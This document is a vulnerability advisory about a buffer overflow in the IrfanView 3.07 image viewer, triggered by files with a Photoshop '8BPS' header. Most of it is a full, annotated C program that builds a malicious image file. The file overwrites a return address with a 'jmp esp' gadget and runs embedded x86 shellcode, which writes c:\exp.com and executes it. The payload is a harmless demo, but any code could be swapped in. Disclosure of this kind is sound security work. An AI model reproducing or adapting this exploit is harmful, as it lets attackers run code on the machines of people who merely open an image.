COMMAND

    Irfan view

SYSTEMS AFFECTED

    Irfan view 3.07

PROBLEM

    UNYUN found the following.  The popular image viewer "IrfanView32"
    contains a buffer overflow in its handling of Adobe Photoshop image
    files.  IrfanView identifies the image type from the file header, not
    from the file extension: if the "8BPS" pattern is found in the header,
    the file is treated as a Photoshop image.  UNYUN believes the overflow
    occurs while reading the data that follows this marker.  A GPF (crash)
    dialog box can be triggered with the following file:

        8BPSaaaaaaaaaaaaaa .... long 'a'

    Such a file can be made with notepad.exe.  The overflow is exploitable
    when suitable values are placed in the stack area (the sample below
    overwrites a saved return address), so any code stored in the image
    file -- a virus, a trojan, a destructive payload -- can be executed.
    This means that simply downloading image files and viewing them is
    dangerous.  Of course, the same danger may exist in other software,
    such as movie players and audio players.  UNYUN wrote the following
    sample code.  It generates an image file containing exploit code that
    creates "exp.com" in "c:\" and executes it ("exp.com" is a simple demo
    program, there is no danger).  Because IrfanView detects the type from
    the "8BPS" header, the generated file may carry any extension (e.g.
    .jpg).  The sample hard-codes addresses from Japanese Windows 98 and
    was tested only there.

    /*=============================================================================
       Irfan View 3.07 Exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguin@backsection.net)
      =============================================================================
    */

    #include    <stdio.h>
    #include    <stdlib.h>
    #include    <string.h>
    #include    <windows.h>
    
    /* Size of the generated file; everything not explicitly set is 0x90. */
    #define     MAXBUF          0x22e0
    /* File offset at which the saved return address of the vulnerable
     * routine is overwritten (specific to IrfanView 3.07). */
    #define     RETADR          0x31E
    /* Stored at RETADR+8 and skipped by a short jmp.  The author's comment
     * calls it a writable buffer pointer; presumably a stack slot the
     * vulnerable routine or its caller still dereferences after the
     * overflow -- TODO confirm, not verifiable from this listing. */
    #define     FAKE_ADR        0x80101010  // Writable buffer pointer
    
    /* Address of a "jmp esp" instruction, used as the new return address.
     * OS/locale specific: taken from Japanese Windows 98. */
    #define     JMPESP_ADR      0xbffca4f7  // You have to change this value
                                            // for non-Japanese Windows98.
    /* Photoshop magic.  Only the first 4 bytes are copied into the file
     * (see main()); the explicit \0 in the literal is never used. */
    #define     HEAD            "8BPS\0"
    
    /*
     * Win32 x86 payload: 201 bytes of code followed by a terminating 0x00 so
     * that main() can strlen()/strcat() it.  The array is 300 bytes because
     * main() appends string_buffer (DLL/function-name table, output path and
     * the exp.com image) directly after the code.
     *
     * Structure as read from the bytes (not re-assembled here, so treat as a
     * reviewer's reading):
     *   - 0x00: jmp short -> 0x51, which jmps to the call at 0xC4; that call
     *     returns to 0x02 (pop edi), so edi = address of the table appended
     *     at 0xC9 (classic jmp/call/pop).
     *   - 0x03..0x1C: xor al,al then mov [edi+N],al for N = 0x0A, 0x10, 0x17,
     *     0x1E, 0x23, 0x26, 0x2D, 0x3C: replaces the '_' separators of
     *     string_buffer with NULs, splitting it into separate C strings.
     *     The last N (at 0x1C) is patched by main() to the real end of the
     *     output path.
     *   - mov eax,imm32 placeholders at 0x1F (LoadLibrary) and at 0x32, 0x5E,
     *     0x88, 0xBC (GetProcAddress); main() patches in the addresses seen
     *     in the generating process, so the payload only works if the victim
     *     has them at the same addresses.
     *   - 0x6D and 0x77 are one-byte immediates that main() patches with the
     *     size of exp.com and the table offset where its bytes start.
     *   - mov [edi+0x2E],eax stores a 4-byte value into the "****" slot of
     *     the table -- presumably the FILE* returned by fopen.
     * Apparently the remainder resolves fopen/fwrite/fclose/system/exit from
     * msvcrt.dll via call eax / call ecx, writes exp.com and runs it.
     */
    unsigned char   exploit_code[300]={
     0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
     0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
     0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
     0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
     0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
     0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
     0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
     0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
     0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
     0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
     0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
     0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
     0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
    };
    
    /*
     * "exp.com": the 21-byte 16-bit DOS .COM program that the payload writes
     * to c:\exp.com and runs.  It appears to select VGA mode 0x13 and then
     * loop writing pixels through int 10h / AH=0Ch (the harmless demo).
     *
     * main() copies it with strlen()/strcat(), so the program must not
     * contain a 0x00 byte; the trailing 0x00 is only the C terminator and
     * is not part of the program.
     */
    unsigned char   exploit_data[1000]={
    0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
    0x20,0x77,0xf1,0xeb,0xf1,0x00
    };
    
    /* Offsets inside exploit_code of the four 32-bit immediates that main()
     * overwrites with the address of GetProcAddress (each follows a 0xB8
     * "mov eax, imm32" opcode). */
    int  GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
    
    /* String table appended to exploit_code by main().  The '_' separators
     * are turned into NULs by the payload at runtime; "****" is a 4-byte slot
     * the payload writes into.  main() appends filename, another '_' and the
     * exp.com image.  Sized 1000 to leave room for the concatenation. */
    char string_buffer[1000]  ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
    /* Path created on the victim.  Its length is patched into the payload so
     * the payload can locate the exp.com bytes that follow it in the table. */
    char filename[100]        = "c:\\exp.com";
    
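    /*
     * Entry point: build the crafted "Photoshop" file and write it to argv[1].
     *
     * File layout (offsets from the start of the file):
     *   0x000        "8BPS" magic, so IrfanView takes the Photoshop path
     *   0x004..      0x90 (NOP) filler
     *   RETADR       JMPESP_ADR, little-endian: the overwritten return address
     *   RETADR+4     two NOPs, then "jmp short +4" (EB 04) over FAKE_ADR
     *   RETADR+8     FAKE_ADR (skipped by that jmp)
     *   RETADR+12    exploit_code with its string table appended
     *   ...          0x90 filler up to MAXBUF bytes
     *
     * Before the copy, the mov-eax immediates in exploit_code are patched with
     * this process's LoadLibrary/GetProcAddress addresses (the payload assumes
     * IrfanView sees them at the same addresses), and three one-byte length
     * fields are patched so the payload can locate the path and the exp.com
     * image inside the appended string table.
     *
     * Fixes relative to the original listing:
     *   - the original wrote buf[MAXBUF] = 0, one byte past the end of buf; the
     *     byte was never read (the file is written with an explicit length), so
     *     the out-of-bounds write is dropped;
     *   - the concatenation into the fixed-size global arrays and the final
     *     copy into buf are bounds-checked, and the one-byte length fields are
     *     checked for truncation;
     *   - fwrite()/fclose() failures are reported instead of printing "Done."
     *
     * Exits with status 1 on a usage error, a failed size check or an I/O
     * failure; returns 0 on success.
     */
    int main(int argc, char *argv[])
    {
        unsigned char   buf[MAXBUF];
        unsigned char   l1, l2;
        unsigned int    ip, p1, p2, i;
        size_t          code_len, table_len;
        FILE            *fp;
    
        if (argc < 2) {
            printf("usage : %s outputfile\n", argv[0]);
            exit(1);
        }
    
        /* NOP filler everywhere we do not write something specific. */
        memset(buf, 0x90, MAXBUF);
        memcpy(buf, HEAD, 4);
    
        /* Saved return address -> "jmp esp" gadget. */
        ip = JMPESP_ADR;
        buf[RETADR    ] = ip & 0xff;
        buf[RETADR + 1] = (ip >> 8) & 0xff;
        buf[RETADR + 2] = (ip >> 16) & 0xff;
        buf[RETADR + 3] = (ip >> 24) & 0xff;
        /* After the ret, esp points at RETADR+4: NOP, NOP, then a short jmp
         * over the 4-byte FAKE_ADR onto the payload at RETADR+12. */
        buf[RETADR + 6] = 0xeb;
        buf[RETADR + 7] = 0x04;
    
        ip = FAKE_ADR;
        buf[RETADR + 8]  = ip & 0xff;
        buf[RETADR + 9]  = (ip >> 8) & 0xff;
        buf[RETADR + 10] = (ip >> 16) & 0xff;
        buf[RETADR + 11] = (ip >> 24) & 0xff;
    
        /* Bootstrap imports, resolved in *this* process. */
        p1 = (unsigned int)LoadLibrary;
        p2 = (unsigned int)GetProcAddress;
        exploit_code[0x1f] = p1 & 0xff;
        exploit_code[0x20] = (p1 >> 8) & 0xff;
        exploit_code[0x21] = (p1 >> 16) & 0xff;
        exploit_code[0x22] = (p1 >> 24) & 0xff;
    
        for (i = 0; i < 4; i++) {
            exploit_code[GetProcAddress_fcp[i]    ] = p2 & 0xff;
            exploit_code[GetProcAddress_fcp[i] + 1] = (p2 >> 8) & 0xff;
            exploit_code[GetProcAddress_fcp[i] + 2] = (p2 >> 16) & 0xff;
            exploit_code[GetProcAddress_fcp[i] + 3] = (p2 >> 24) & 0xff;
        }
    
        /* Lengths are taken BEFORE the concatenation: l1 is the table index of
         * the '_' that follows the path, l2 the size of exp.com.  Both become
         * single-byte immediates in the payload, so they must fit in a byte
         * (l1 + 1 is patched in as well). */
        code_len  = strlen((char *)exploit_code);
        table_len = strlen(string_buffer) + strlen(filename) + 1
                  + strlen((char *)exploit_data);
        if (table_len >= sizeof string_buffer
            || code_len + table_len >= sizeof exploit_code
            || strlen(filename) + strlen(string_buffer) >= 0xff
            || strlen((char *)exploit_data) > 0xff) {
            printf("payload does not fit\n");
            exit(1);
        }
        l1 = (unsigned char)(strlen(filename) + strlen(string_buffer));
        l2 = (unsigned char)strlen((char *)exploit_data);
        strcat(string_buffer, filename);
        strcat(string_buffer, "_");
        strcat(string_buffer, (char *)exploit_data);
        strcat((char *)exploit_code, string_buffer);
        exploit_code[0x1c] = l1;
        exploit_code[0x6d] = l2;
        exploit_code[0x77] = l1 + 1;
    
        /* Code plus table must fit inside the file after the stack layout. */
        if (RETADR + 12 + code_len + table_len > MAXBUF) {
            printf("payload does not fit\n");
            exit(1);
        }
        memcpy(buf + RETADR + 12, exploit_code, code_len + table_len);
    
        if ((fp = fopen(argv[1], "wb")) == NULL) {
            printf("Can not write file '%s'\n", argv[1]);
            exit(1);
        }
        /* A short write or a failed flush would leave a file that silently
         * does not contain the payload; report it instead of "Done." */
        if (fwrite(buf, 1, MAXBUF, fp) != MAXBUF || fclose(fp) != 0) {
            printf("Can not write file '%s'\n", argv[1]);
            exit(1);
        }
        printf("Done.\n");
        return 0;
    }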

SOLUTION

    Nothing yet: no vendor fix was available when this was written.  Until
    a fixed version is released, do not open image files from untrusted
    sources in IrfanView 3.07.  Note that the vulnerable code path is
    selected by the "8BPS" header, not by the file extension, so filtering
    on extension is no protection.